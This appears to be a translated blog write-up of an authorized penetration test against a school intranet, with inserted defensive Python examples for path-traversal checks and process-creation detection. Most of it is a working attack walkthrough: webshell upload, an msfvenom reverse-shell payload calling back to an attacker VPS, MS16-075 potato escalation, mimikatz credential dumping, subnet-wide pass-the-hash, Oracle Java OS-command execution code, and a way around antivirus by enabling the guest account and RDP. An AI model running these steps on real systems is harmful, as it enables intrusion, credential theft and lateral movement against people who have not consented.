
Title: A penetration test for the school's intranet


0x00 Initial Exploration of Intranet

After getting authorization from the Information Center teacher to run a penetration test against the school's intranet, I started collecting information on the systems in use there. Most of them run recent framework versions with no publicly known vulnerabilities, which stalled my initial reconnaissance. But after revisiting the various web systems the school exposes, I found some surprising ones.


The school had deployed many new systems but had not shut down the old ones. After some searching, I confirmed that one of the old systems had an arbitrary file upload vulnerability.


No filtering at all; a free gift, one might say.


It even returns the path of the uploaded webshell. But I ran into something odd: after connecting with AntSword and with China Chopper, the returned paths differ and so do the files listed.


The shell connected through AntSword could not upload files, while the one connected through China Chopper could. The webshell also got its IP blocked after executing a command, so I suspected a WAF. I therefore first uploaded an msf aspx payload to get a meterpreter session, and used windows-exploit-suggester to look for missing patches.


It reported MS16-075, which is very handy. I used the juicy_potato module in msf directly. Remember to change the CLSID; you can find one here:

https://github.com/ohpe/juicy-potato/tree/master/CLSID

It is best to choose a bind_tcp (forward connection) payload, otherwise the shell may not come back.


This gives SYSTEM privileges. The next step is to gather information from the machine that will help with lateral movement. Oddly, this machine used to be domain-joined, but the domain is gone now and no domain controller could be found. So the focus turned to credential reuse (trying collected passwords across other hosts). I used the mimikatz module bundled with msf to get passwords.


I tried them against two or three machines; some had port 445 open but not 3389.

With 445 open one could try MS17-010, but since that could affect systems in use, I chose the safer psexec module for credential reuse, i.e. pass-the-hash. When a plaintext password cannot be obtained, one can dump the password hash and use the psexec module to pass the hash instead. Everything obtained this way ran as SYSTEM.

The following steps were tedious: keep reusing collected credentials to compromise more machines and harvest more passwords. After enough machines and passwords were collected, I found the border router, but none of the collected passwords worked for it, so I gave up. That was the end of this network segment.

0x01 In-depth exploration

Looking through the new system, I found an arbitrary file download vulnerability in one of its functions.


And the service runs as root. The ideal case would be reading /etc/shadow and cracking the root password (that failed), so I then read /root/.bash_history to get the root user's command history. It recorded the Tomcat deployment path and backed-up source code archives. Downloading the source code to gather information turned up a critical piece: most machines in this network segment use an Oracle database and have not changed the default SID. I also still had several passwords to try.
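As an added example (not code from the school's system or from the post), here is how a download endpoint like the one above should resolve a requested name so that ../ sequences, URL-encoded variants, absolute paths and planted symlinks cannot reach /etc/shadow or /root/.bash_history; the function and file names are hypothetical and the export directory is built in a temp folder.

```python
import os
import tempfile
from urllib.parse import unquote

class DownloadRejected(Exception):
    """Raised when a requested name does not resolve to a regular file under the export dir."""

def resolve_download(base_dir: str, requested: str) -> str:
    """Return the real path for `requested` inside base_dir, or raise DownloadRejected."""
    name = requested
    for _ in range(3):                 # peel double/triple URL encoding (%252e%252e -> ..)
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name:
        raise DownloadRejected("NUL byte in requested name")
    base = os.path.realpath(base_dir)
    # realpath() collapses ".." and follows symlinks, so a link planted inside the
    # export dir that points at /root/.bash_history is caught; an absolute `name`
    # makes os.path.join discard `base`, which the containment check then rejects.
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise DownloadRejected(f"{requested!r} resolves outside {base_dir}")
    if not os.path.isfile(target):
        raise DownloadRejected(f"{requested!r} is not a regular file")
    return target

def demo() -> dict:
    """Build a throwaway export directory and classify constructed requests."""
    root = tempfile.mkdtemp()
    export = os.path.join(root, "export")
    os.mkdir(export)
    with open(os.path.join(export, "backup.tar.gz"), "wb") as f:
        f.write(b"constructed archive")
    with open(os.path.join(root, "secret.txt"), "w") as f:   # stands in for /etc/shadow
        f.write("outside the export directory")
    os.symlink(os.path.join(root, "secret.txt"), os.path.join(export, "link.txt"))
    verdicts = {}
    for req in ("backup.tar.gz", "../secret.txt", "%2e%2e/secret.txt",
                "%252e%252e/secret.txt", "/etc/passwd", "link.txt", "nope.bin"):
        try:
            resolve_download(export, req)
            verdicts[req] = "allowed"
        except DownloadRejected:
            verdicts[req] = "rejected"
    return verdicts
```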

After some brute forcing, I found an Oracle database whose SYSTEM user password had never been changed from the default, manager. Everyone should know that an Oracle database can execute operating system commands, and the SYSTEM user fully meets the requirements for doing so. I found a tool online that skips the tedious steps and executes commands directly.


0x03 Bypassing Huorong behavior detection

But another strange problem appeared: I could only run a few commands. Although I am the SYSTEM user, commands like net user returned no output. It turned out that Huorong antivirus intercepts abnormal behavior. So I tried connecting to the server directly with sqlplus in Navicat. Following the steps found online, whether a command executed can be judged from the 1 or 0 the server returns.

    create or replace and compile java source named "OSCommand" as
    -- java: OS COMMAND
    import java.io.*;
    import java.lang.*;

    public class OSCommand {
        public static String Run(String Command) {
            Runtime rt = Runtime.getRuntime();
            int rc = -1;
            try {
                Process p = rt.exec(Command);
                int bufSize = 32000;
                int len = 0;
                byte buffer[] = new byte[bufSize];
                String s = null;
                BufferedInputStream bis = new BufferedInputStream(p.getInputStream(), bufSize);
                len = bis.read(buffer, 0, bufSize);   // at most the first 32000 bytes of stdout
                rc = p.waitFor();
                if (len != -1) {
                    s = new String(buffer, 0, len);
                    return s;
                }
                return rc + "";   // no output: return the exit code as a string
            }
            catch (Exception e) {
                e.printStackTrace();
                return "-1\ncommand[" + Command + "]\n" + e.getMessage();
            }
        }
    }
    /
    show errors

    create or replace function OSexec(cCommand IN string) return varchar2 is
    -- function: OS EXEC
    -- descr: PL/SQL wrapper for the Java OSCOMMAND stored proc
    --
    language JAVA
    name 'OSCommand.Run(java.lang.String) return java.lang.String';
    /
    show errors

    -- Run as sysdba. Substitute SCOTT with the applicable schema that owns the OSEXEC
    -- and OSCOMMAND stored procs.
    declare
        SCHEMA varchar2(30) := 'SCOTT';
    begin
        dbms_java.grant_permission(SCHEMA, 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
        dbms_java.grant_permission(SCHEMA, 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '*');
        dbms_java.grant_permission(SCHEMA, 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '*');
        commit;
    end;
    /

    -- View local connection information
    SQL> select OSexec('ipconfig') as STDOUT from dual;

    STDOUT
    --------------------------------------------------------------------------------
    Windows IP ?
    ??l? 3:
    l? DNS ? . .
    ?t? IPv6 ? . ************
    IPv4 ? 192.168.100.100
    ? 255.255.255.0
    ? 0.0.0.0

    -- Activate the guest account
    SQL> select OSexec('cmd.exe /c net user guest /active:yes') as STDOUT from dual;

    STDOUT
    --------------------------------------------------------------------------------
    0

Because antivirus software monitors Oracle's behavior, the attack has to be assembled from actions that are not intercepted.

What I didn't expect was that when I directly ran the command to open port 3389, Huorong did not intercept it, yet net user and similar commands would not execute. Then I remembered the guest user: I enabled guest and added it to the Administrators group, and this time nothing was blocked. After connecting via Remote Desktop, however, running mimikatz on the machine or getting a reverse shell back to Cobalt Strike both failed.

In addition, some rights of the guest user are disabled, such as adding users and other sensitive operations. But when running net user I noticed a user I had seen on an earlier machine and whose password I already had. So I used sqlplus to add that user to the Administrators group.

So Huorong's interception rule is that users cannot be added, but existing users can be added to the Administrators group, the guest user can be activated, and 3389 can be opened. After logging into this machine again, I still could not get a reverse shell or read its password. At this point a junior schoolmate told me that you can simply open Huorong and turn off the protection, after which a reverse shell works. Me: ?
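As an added example (not code from the post or from Huorong), the detection side of the Oracle command execution and of the interception rule described above: a database process spawning a shell, plus each of the alternatives the author found unblocked (guest enabled, an existing user added to Administrators, RDP enabled through fDenyTSConnections), flagged over constructed Sysmon-style process-creation events. Field names follow Sysmon event 1; the Oracle install path and user names are made up.

```python
import re
from typing import Dict, List, Tuple

DB_IMAGES = {"oracle.exe"}                    # database server binary (assumed name)
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}  # interpreters a DB process should never spawn

# rule name -> case-insensitive pattern over CommandLine. Blocking only "net user X /add"
# (what the post observed) leaves every one of these routes to an admin login open.
RULES = {
    "user_create":     r"\bnet1?\s+user\s+\S+(\s+\S+)?\s+/add\b",
    "user_enable":     r"\bnet1?\s+user\s+\S+\s+/active:yes\b",
    "admin_group_add": r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "rdp_enable":      r"fDenyTSConnections\b.*\s/d\s+0\b",
}

def base(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, CommandLine) hits for Sysmon-style ProcessCreate events."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if base(ev["ParentImage"]) in DB_IMAGES and base(ev["Image"]) in SHELL_IMAGES:
            hits.append(("db_spawned_shell", ev["CommandLine"]))
        for name, pattern in RULES.items():
            if re.search(pattern, ev["CommandLine"], re.IGNORECASE):
                hits.append((name, ev["CommandLine"]))
    return hits

def ev(parent: str, image: str, cmd: str) -> Dict[str, str]:
    return {"ParentImage": parent, "Image": image, "CommandLine": cmd}

# Constructed events reproducing the post's sequence plus one benign control.
ORA = r"D:\app\oracle\product\11.2.0\dbhome_1\BIN\oracle.exe"   # made-up install path
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ev(ORA, CMD, "cmd.exe /c ipconfig"),
    ev(ORA, CMD, "cmd.exe /c net user guest /active:yes"),
    ev(CMD, r"C:\Windows\System32\net.exe", "net localgroup administrators guest /add"),
    ev(CMD, r"C:\Windows\System32\reg.exe",
       r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
       r"/v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ev(ORA, CMD, "cmd.exe /c net user tempadmin P@ss123 /add"),   # the action that was blocked
    ev(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for rule, cmdline in detect(SAMPLE_EVENTS):
        print(f"{rule:17} {cmdline}")
```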

Then I got the shell in one go, but I still could not read the plaintext password, so I thought about dumping the hash and cracking it. Then I remembered a foreign website that can crack NTLM hashes:

https://www.objectif-securite.ch/ophcrack


After obtaining the password, it was the familiar routine: gather information, then reuse the credentials against other hosts.

Then I found that Xftp on the server had saved passwords for several servers. Here is a cheeky trick: an asterisk password viewer tool can reveal the passwords saved there.


Along the way I also picked up several machines with root access. Not wanting to drag this out further, I recorded all the collected passwords and tried them across the whole network segment, which turned up many weak passwords.


Congratulations to the Information Center teacher on the overtime ahead.

0x04 Summary

1. At the attachment upload location in the target's old system, you can directly upload a one-line webshell, and the upload path is returned.

2. After connecting to the one-line webshell through AntSword, files cannot be uploaded; connecting through China Chopper can upload files.

3. Generate an aspx backdoor with msf on the public network, upload the generated shell.aspx to the target site through the big webshell, and access shell.aspx.

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<public VPS> LPORT=12345 -f aspx > shell.aspx

4. Listen with MSF and receive the reverse shell.

    msf > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST <public VPS>
    msf exploit(handler) > set LPORT 12345
    msf exploit(handler) > exploit

5. Run systeminfo from China Chopper's command terminal, save the patch information to info.txt, download it locally, and use windows-exploit-suggester to find a usable privilege escalation PoC: MS16-075 (usable PoCs can also be found by online comparison at http://bugs.hacking8.com/tiquan/). https://github.com/1nf1n17yk1ng/Windows-Exploit-Suggester-Python3

    systeminfo > info.txt
    python3 windows-exploit-suggester.py --update
    python3 windows-exploit-suggester.py --database 2021-07-15-mssb.xls --systeminfo info.txt

6. Escalate via MS16-075 in MSF (https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075).

    meterpreter > getuid
    Server username: IIS APPPOOL\DefaultAppPool
    meterpreter > getprivs
    meterpreter > upload /root/potato.exe C:\Users\Public
    meterpreter > cd C:\Users\Public
    meterpreter > use incognito
    meterpreter > list_tokens -u
    meterpreter > execute -cH -f ./potato.exe
    meterpreter > list_tokens -u
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

7. Load mimikatz through msf to read plaintext passwords and hashes.

    meterpreter > load mimikatz
    meterpreter > mimikatz_command -f samdump::hashes
    meterpreter > mimikatz_command -f sekurlsa::searchPasswords
    meterpreter > msv         # get hash values
    meterpreter > kerberos    # get plaintext

8. Batch pass-the-hash with the collected hashes.

    meterpreter > upload /root/crackmapexec C:\Users\Public
    meterpreter > crackmapexec 192.168.1.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

   or

    meterpreter > background
    msf > use exploit/windows/smb/psexec
    msf > set payload windows/meterpreter/reverse_tcp
    msf > set LHOST 192.168.232.128
    msf > set LPORT 2222
    msf > set rhosts 10.206.14.1/24
    msf > set smbuser administrator
    msf > set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    msf > run

   or

    msf > use auxiliary/admin/smb/psexec_command
    msf > set rhosts 10.206.14.1/24
    msf > set smbuser administrator
    msf > set smbpass aad3b435b51404eeaad3b435b51404ee:579110c49145015c47ecd267657d3174
    msf > run

   (Note: the LM hash half can be any 32 hex characters.)

4. I found a file download function in the target's new system and guessed there might be an arbitrary file download vulnerability. This can be fuzzed in batch with Burp's Intruder. First read /etc/passwd and /etc/shadow, then try to crack the hash values.

5. Then, through the arbitrary file download, read /root/.bash_history and see the administrator compressing the website directory; the archive name and the location it was saved to under the web root are visible, so the backed-up source code can be downloaded directly.

6. The Oracle database configuration file was found in the source code, leaking the username system and its password, and the IP address 121.1.100.100. With the default SID orcl you can connect. Here oracleshell was used to connect remotely.

7. The command to add a user via oracleshell was intercepted; running tasklist /svc showed Huorong on the target database server. However, activating the guest account and adding guest to the Administrators group is not intercepted by Huorong, and opening 3389 is not intercepted either.

    net user guest /active:yes
    net user guest Test@123
    net localgroup administrators guest /add
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

   Or connect to the server with sqlplus in Navicat:

    SQL> select OSexec('ipconfig') as STDOUT from dual;
